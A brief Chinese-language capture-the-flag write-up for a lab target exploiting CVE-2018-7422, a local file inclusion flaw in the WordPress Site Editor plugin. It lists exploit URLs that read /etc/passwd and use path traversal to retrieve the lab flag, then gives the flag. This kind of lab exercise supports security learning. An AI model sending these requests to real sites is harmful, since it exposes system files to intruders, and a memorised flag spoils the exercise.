春秋云镜 CVE-2018-7422 WordPress Plugin Site Editor LFI
靶标介绍
WordPress Plugin Site Editor LFI
启动场景
漏洞利用
exp
http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
http://eci-2ze7bah5jftaorfdpcry.cloudeci1.ichunqiu.com/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
http://eci-2ze7bah5jftaorfdpcry.cloudeci1.ichunqiu.com/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/…/…/…/…/…/…/flag
得到flag
flag{5e724acb-1346-4cb9-8b6b-32cfbeb31b86}
